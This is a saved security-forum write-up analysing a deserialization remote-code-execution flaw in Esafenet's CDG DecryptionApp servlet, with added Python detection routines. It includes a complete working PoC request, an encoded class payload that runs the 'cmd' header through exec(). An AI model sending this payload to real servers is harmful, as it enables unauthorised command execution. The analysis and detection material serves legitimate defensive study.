Penetration_Testing_POC/books/亿赛通电子文档安全管理系统DecryptionApp反序列化漏洞RCE.html

2024-08-30 22:09:31 -07:00
<!DOCTYPE html> <html style><!--
Page saved with SingleFile
url: https://forum.butian.net/article/535
--><meta charset=utf-8>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=viewport content="width=device-width, initial-scale=1">
<meta name=csrf-token content=WmNQOk8xxNpddtEgAVMcl2bx5k4GG1wgx7QKrDfh>
<title>A certain vendor's Electronic Document Security Management System DecryptionApp deserialization vulnerability (RCE)</title>
<meta name=keywords content="QiAnXin,Tianyan,Butian,vulnerability,intelligence,attack and defense,security">
<meta name=description content="QiAnXin Attack and Defense Community - A certain vendor's Electronic Document Security Management System DecryptionApp deserialization vulnerability (RCE)">
<meta name=author content="QIANXIN Team">
<meta name=copyright content="2021 QIANXIN.com">
<body>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">A certain vendor's Electronic Document Security Management System DecryptionApp deserialization vulnerability (RCE)</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>Vulnerability analysis</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
A certain vendor's Electronic Document Security Management System DecryptionApp deserialization vulnerability (RCE)
</div>
<textarea id=md_view_content style=display:none value="A certain vendor's Electronic Document Security Management System DecryptionApp deserialization vulnerability (RCE)
==================================
**Background**: this product is built on the servlet framework, so the usual first step is to open web.xml, find the relevant route, and from there locate the code.
Code analysis
----
First open the web.xml file under WEB\_INF and search (Ctrl+F) for `DecryptionApp`
![image-20240812154352756](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-1f935b259ffe2b36ead8e484f642ff5b4329342f.png)
Ctrl-click into `com.esafenet.workflow.servlet.DecryptionAppServlet`. The class extends `HttpServlet`, so the method to focus on is the one that handles client interaction, `service`, whose `request` parameter is attacker-controlled.
![image-20240812154512539](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b88f59af4fda6ece1d980fa90dfbd6c7bd0b6af9.png)
Now let us go through the body of this `service` method in detail.
![image-20240812155048535](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-54dbb648a23c634b56b7159ce85c927eafcf43b0.png)
**Analysis**: lines 65-83 first create a `DecryptionApp` entity object, a List, and a `DecryptionAppResp` entity object. The data the client sent in `request` is then passed to `getXMLFromRequest`, which extracts an XML string, and that string is handed to `fromXML`, which turns it into a `DecryptionApp` object assigned to `dec`.
Next, lines 84-109:
![image-20240812155704650](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-7b0bcb5ec5eec41a0ec0fe0baf5b5092e96c2abd.png)
**Analysis**: `Flow` and `FlowDetail` objects are instantiated; both classes implement the `Serializable` interface. The code then reads the `UserName` and `Files` values from `dec`, sets `APPDate`, and checks whether the list parameter is empty; if it is not, it enters a for loop. The loop handles the file uploads tied to the approval workflow (the entries of the list): it checks whether a file already exists, and if so sends the corresponding XML back to the client; if not, it builds the file path and the list string.
![image-20240812164028115](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-5138bc0b731fc5a13fbb263316a9af259fd9038f.png)
The code applies no filtering at all to the client-supplied data; it only performs a simple duplicate check against the database. That is what enables the file upload vulnerability, and because the Flow class implements the Serializable interface, a deserialization vulnerability exists as well.
Lines 111-270 are long and contribute little to exploitation, so briefly: this block handles the approval process of the workflow (Flow), including determining the approvers, assigning approval levels and initialising the approval state.
![image-20240812161608658](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-f1d2241a4678c6dbaee950c372920c4efdfd4f1f.png)
Next, lines 265-297:
![image-20240812163514010](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-dd692f03ca1d48656bd7afa01389b7203bd16f30.png)
**Analysis**: this part sets the template name, the flag bits and the file list string built earlier on the `flow` workflow object, then opens the SQL database connection and calls the `addFlow` method of `flowDao` to add the `flow` object to the database. If that succeeds, the data is finally returned to the client as XML.
Summary
--
The vulnerability comes from two things:
1. The client-supplied input is not restricted in terms of file content or similar checks, so arbitrary files can be uploaded.
2. The Flow class implements the `Serializable` interface, so if the uploaded parameters contain serialized content, it can be used to perform deserialization and in turn steal data.
Vulnerability reproduction
----
**poc**
POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: text/xml
cmd: whoami
NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOK
"></textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><h1 blockindex=0>某通 Electronic Document Security Management System: DecryptionApp deserialization vulnerability leading to RCE</h1>
<p blockindex=1><strong>Background</strong>: the 某通 product is built on the Servlet framework, so the usual first step is to look up the relevant route in web.xml and from there locate the handling code.</p>
<h2 blockindex=2>Code analysis</h2>
<p blockindex=3>First open the web.xml file under WEB-INF and search (Ctrl+F) for <code>DecryptionApp</code>.</p>
<p blockindex=4><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-1f935b259ffe2b36ead8e484f642ff5b4329342f.png" alt="image-20240812154352756"></p>
<p blockindex=5>Ctrl-click through to <code>com.esafenet.workflow.servlet.DecryptionAppServlet</code>. The class extends <code>HttpServlet</code>, so the method to focus on is the one that handles client interaction, <code>service</code>, whose <code>request</code> parameter is under our control.</p>
<p blockindex=6><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b88f59af4fda6ece1d980fa90dfbd6c7bd0b6af9.png" alt="image-20240812154512539"></p>
<p blockindex=7>Now let's look at the body of the <code>service</code> method in detail.</p>
<p blockindex=8><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-54dbb648a23c634b56b7159ce85c927eafcf43b0.png" alt="image-20240812155048535"></p>
<p blockindex=9><strong>Analysis</strong>: start with lines 65-83. This part creates, in turn, an entity object <code>DecryptionApp</code>, a <code>List</code>, and an entity object <code>DecryptionAppResp</code>. It then calls <code>getXMLFromRequest</code> on the incoming <code>request</code> to extract the XML string sent by the client, passes that string to <code>fromXML</code> to turn it into a <code>DecryptionApp</code> object, and assigns the result to <code>dec</code>.</p>
<p blockindex=10>Next, lines 84-109:</p>
<p blockindex=11><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-7b0bcb5ec5eec41a0ec0fe0baf5b5092e96c2abd.png" alt="image-20240812155704650"></p>
<p blockindex=12><strong>Analysis</strong>: <code>Flow</code> and <code>FlowDetail</code> objects are instantiated; both classes implement the <code>Serializable</code> interface. The code then reads <code>UserName</code> and <code>Files</code> from <code>dec</code>, sets <code>APPDate</code>, and checks whether the list parameter is empty; if it is not, it enters a <code>for</code> loop. That loop handles the file uploads that belong to the approval workflow (the entries of the list): it checks whether each file already exists and, if so, returns the corresponding XML to the client; if not, it builds the file path and the file-list string.</p>
<p blockindex=13><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-5138bc0b731fc5a13fbb263316a9af259fd9038f.png" alt="image-20240812164028115"></p>
<p blockindex=14>The code applies no filtering at all to the client-supplied data; it only performs a simple duplicate check against the database. That is what makes the file upload exploitable, and because the <code>Flow</code> class implements the <code>Serializable</code> interface, a deserialization vulnerability exists as well.</p>
<p blockindex=15>Lines 111-270 are long and contribute little to exploiting the vulnerability, so only a summary: this code handles the approval process of the workflow (<code>Flow</code>), including determining the approvers, assigning approval levels, and initializing the approval state.</p>
<p blockindex=16><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-f1d2241a4678c6dbaee950c372920c4efdfd4f1f.png" alt="image-20240812161608658"></p>
<p blockindex=17>Next, lines 265-297:</p>
<p blockindex=18><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-dd692f03ca1d48656bd7afa01389b7203bd16f30.png" alt="image-20240812163514010"></p>
<p blockindex=19><strong>Analysis</strong>: this part sets the template name, a flag, and the file-list string built earlier on the workflow object <code>flow</code>, then opens a connection to the SQL database and calls <code>flowDao</code>'s <code>addFlow</code> method to insert the <code>flow</code> object. If that succeeds, our data is finally returned to the client as XML.</p>
<h2 blockindex=20>Summary</h2>
<p blockindex=21>The vulnerability results from two weaknesses:</p>
<ol blockindex=22>
<li>Client-supplied input is not subject to any restriction (on file content or otherwise), so arbitrary files can be uploaded.</li>
<li>The <code>Flow</code> class implements the <code>Serializable</code> interface; if the uploaded parameters contain serialized content, it is deserialized, which can lead to theft of the related data.</li>
</ol>
<h2 blockindex=23>Reproducing the vulnerability</h2>
<p blockindex=24><strong>PoC</strong></p>
<p blockindex=25>POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO HTTP/1.1</p>
<p blockindex=26>Host: your-ip</p>
<p blockindex=27>User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36</p>
<p blockindex=28>Accept-Encoding: gzip, deflate, br</p>
<p blockindex=29>Connection: close</p>
<p blockindex=30>Content-Type: text/xml</p>
<p blockindex=31>cmd: whoami</p>
<p blockindex=32></p>
<p blockindex=33>NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMI
FOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNG
NKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMI</p>
<p blockindex=34><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-aa1e68bf504d8d5023c38103ac21f66a8ac68e2e.png" alt="微信图片_20240812164526"></p>
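<p>Added example (not code from the article or from the product vendor): a small Python triage routine that scores a raw HTTP request against the shape of the PoC above, so that a WAF rule or a log search can be derived from it. It checks the request path and <code>command</code> value shown in the PoC, the <code>cmd</code> header that the class embedded in the PoC reads (see the decompilation in the next section), and the body shape: either the <code>&lt;byte-array&gt;</code> element of the decoded XML or, as in the encoded PoC body on this page, one long run of the letters A to P and nothing else. The sample requests are constructed rather than captured traffic; the host name <code>target.internal</code> and the value <code>command=OTHER</code> are placeholders.</p>

```python
import re
from dataclasses import dataclass, field

# Endpoint and command taken from the PoC request line on the page.
TARGET_PATH = "/CDGServer3/DecryptionApp"
SUSPECT_COMMAND = "GETSYSTEMINFO"
# The decompiled class embedded in the PoC reads a request header named "cmd".
BACKDOOR_HEADER = "cmd"


@dataclass
class Finding:
    """Indicators matched by one request; the score is simply how many matched."""
    path: str
    indicators: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body).

    Header names are lower-cased so lookups are case-insensitive, as HTTP requires.
    """
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()


def triage(raw: str) -> Finding:
    """Return the PoC-shape indicators present in one raw request."""
    method, target, headers, body = parse_request(raw)
    path, _, query = target.partition("?")
    finding = Finding(path=path)
    if path != TARGET_PATH:
        return finding  # other endpoints are out of scope for this rule
    if method == "POST" and f"command={SUSPECT_COMMAND}" in query.split("&"):
        finding.indicators.append(f"command={SUSPECT_COMMAND}")
    if BACKDOOR_HEADER in headers:
        finding.indicators.append("cmd header present")
    if "<byte-array>" in body:
        finding.indicators.append("<byte-array> element in XML body")
    # The PoC body on the page is one long run of the letters A..P and nothing else.
    if len(body) > 512 and re.fullmatch(r"[A-P]+", body):
        finding.indicators.append("body is an A..P letter blob, not XML")
    return finding


# Constructed samples (not captured traffic); "target.internal" and
# "command=OTHER" are placeholders.
SAMPLE_POC = (
    "POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO HTTP/1.1\n"
    "Host: target.internal\n"
    "Content-Type: text/xml\n"
    "cmd: whoami\n"
    "\n" + "NNLINELBIIKEOGPIFLNMHIPN" * 40
)
SAMPLE_DECODED = (
    "POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO HTTP/1.1\n"
    "Host: target.internal\n"
    "Content-Type: text/xml\n"
    "\n<root><byte-array>AAAA</byte-array></root>"
)
SAMPLE_BENIGN = (
    "POST /CDGServer3/DecryptionApp?command=OTHER HTTP/1.1\n"
    "Host: target.internal\n"
    "Content-Type: text/xml\n"
    "\n<root><userName>alice</userName></root>"
)

if __name__ == "__main__":
    for name, sample in (("poc", SAMPLE_POC), ("decoded", SAMPLE_DECODED), ("benign", SAMPLE_BENIGN)):
        result = triage(sample)
        print(f"{name}: score={result.score} indicators={result.indicators}")
```

<p>The score is deliberately a plain count: a request to this servlet carrying the <code>cmd</code> header alone is already worth an alert, because nothing in the legitimate approval workflow described above sends such a header, while the body-shape checks catch the encoded and the decoded forms of the same payload.</p>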
<h3 blockindex=35>PoC analysis</h3>
<p blockindex=36>Readers are probably not entirely clear about this PoC at this point, so let's analyze it.</p>
<p blockindex=37>Decoding the PoC with a tool gives the following:</p>
<p blockindex=38><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-74a26f6d90021b0377427586938d8d6546daed4f.png" alt="image-20240812164946571"></p>
<p blockindex=39><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3c7d549d69f112d6dd302bfa420c88eed66932c8.png" alt="image-20240812170153604"></p>
<p blockindex=40>Inside <code>&lt;byte-array&gt;</code> we find what looks like base64-encoded content; decoding it shows that it is a .class file.</p>
<p blockindex=41><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a7581153f62ba64cc4372eb3684e8f9480776c61.png" alt="微信图片_20240812165145"></p>
<p blockindex=42>Decompiling that .class file with a decompiler gives the following:</p>
<p blockindex=43><img src="https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3087defa29affb13b68b300d95a487e2be753efc.png" alt="image-20240812165405021"></p>
<p blockindex=44>Analyzing this code: it contains a backdoor that lets an attacker pass a <code>cmd</code> parameter in a request header. The code reads the value of the request header named <code>cmd</code> and, depending on the operating system (Linux or Windows), builds the command in the format that <code>exec()</code> expects. An attacker can therefore submit dangerous commands and obtain sensitive information from the target.</p></div></div>
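<p>Added example, not code from the article or from the vendor: the decoded PoC, as the analysis above notes, carries a base64 .class file inside a <code>&lt;byte-array&gt;</code> element, and the decompiled class reads the <code>cmd</code> header and calls <code>exec()</code>. This Python block shows how an analyst can confirm that without loading the class into a JVM: it pulls the base64 out of such XML, checks the class-file magic, walks the constant pool, and lists the runtime API names the class refers to. The XML and the class bytes in it are constructed (a valid header plus a hand-built constant pool, nothing executable) and are not the bytes from the PoC; the list of suspect API names is an assumption about what is worth flagging.</p>

```python
import base64
import re
import struct

CLASS_MAGIC = b"\xca\xfe\xba\xbe"
# Names whose presence in a class sent to a document server deserves a look
# (assumed list): the decompiled PoC class reads a request header and calls exec().
SUSPECT_API = ("java/lang/Runtime", "exec", "java/lang/ProcessBuilder", "getHeader")


def extract_byte_arrays(xml: str) -> list:
    """Base64-decode the text of every <byte-array> element in the XML."""
    chunks = re.findall(r"<byte-array>\s*([A-Za-z0-9+/=\s]+?)\s*</byte-array>", xml)
    return [base64.b64decode("".join(chunk.split())) for chunk in chunks]


def utf8_constants(blob: bytes):
    """Parse the class-file header and constant pool.

    Returns ("major.minor", [every CONSTANT_Utf8 string]). Only the pool is walked,
    which is enough to see which classes and methods the file refers to; the
    class is never loaded.
    """
    if blob[:4] != CLASS_MAGIC:
        raise ValueError("not a Java class file")
    minor, major, count = struct.unpack(">HHH", blob[4:10])
    pos, index, strings = 10, 1, []
    while index < count:
        tag = blob[pos]
        pos += 1
        if tag == 1:                                  # Utf8: u2 length + bytes
            (length,) = struct.unpack(">H", blob[pos:pos + 2])
            pos += 2
            strings.append(blob[pos:pos + length].decode("utf-8", "replace"))
            pos += length
        elif tag in (7, 8, 16, 19, 20):               # Class, String, MethodType, Module, Package
            pos += 2
        elif tag in (3, 4, 9, 10, 11, 12, 17, 18):    # Integer, Float, *ref, NameAndType, *Dynamic
            pos += 4
        elif tag in (5, 6):                           # Long, Double: 8 bytes, two pool slots
            pos += 8
            index += 1
        elif tag == 15:                               # MethodHandle: u1 kind + u2 index
            pos += 3
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        index += 1
    return f"{major}.{minor}", strings


def triage_payload(xml: str) -> list:
    """One report per embedded blob: is it a class file, which version, which suspect names."""
    reports = []
    for blob in extract_byte_arrays(xml):
        if blob[:4] != CLASS_MAGIC:
            reports.append({"is_class": False, "version": None, "suspect_refs": []})
            continue
        version, strings = utf8_constants(blob)
        hits = sorted({s for s in strings if any(api in s for api in SUSPECT_API)})
        reports.append({"is_class": True, "version": version, "suspect_refs": hits})
    return reports


def _utf8(text: str) -> bytes:
    """Encode one CONSTANT_Utf8 pool entry (tag 1, u2 length, bytes)."""
    data = text.encode()
    return b"\x01" + struct.pack(">H", len(data)) + data


# Constructed stand-in for the PoC's class: a valid header and a hand-built
# constant pool, nothing executable. Not the bytes from the article.
FAKE_CLASS = (
    CLASS_MAGIC + struct.pack(">HH", 0, 52)                         # minor 0, major 52 (Java 8)
    + struct.pack(">H", 6)                                          # constant_pool_count = 5 entries + 1
    + _utf8("java/lang/Runtime") + b"\x07" + struct.pack(">H", 1)   # #1 Utf8, #2 Class -> #1
    + _utf8("exec") + _utf8("getHeader") + _utf8("Demo")            # #3, #4, #5
)
SAMPLE_XML = "<root><byte-array>" + base64.b64encode(FAKE_CLASS).decode() + "</byte-array></root>"
SAMPLE_XML_TEXT = "<root><byte-array>" + base64.b64encode(b"just text").decode() + "</byte-array></root>"

if __name__ == "__main__":
    for report in triage_payload(SAMPLE_XML) + triage_payload(SAMPLE_XML_TEXT):
        print(report)
```

<p>The constant pool is parsed only far enough to read the <code>CONSTANT_Utf8</code> entries; a class whose pool names <code>java/lang/Runtime</code> and <code>exec</code> next to <code>getHeader</code> has no business arriving in a document-approval request, so the list of hits is a usable detection signal on its own.</p>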
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
Published 2024-08-23 09:00:01
</li>
<li>Category: <a href=https://forum.butian.net/articles/OA target=_blank rel="noopenner noreferrer">OA products</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<footer id=footer>
<div class=container>
<div class=text-center>
<a href=https://forum.butian.net/>奇安信攻防社区 (Qi'anxin Attack and Defense Community)</a><span class=span-line>|</span>
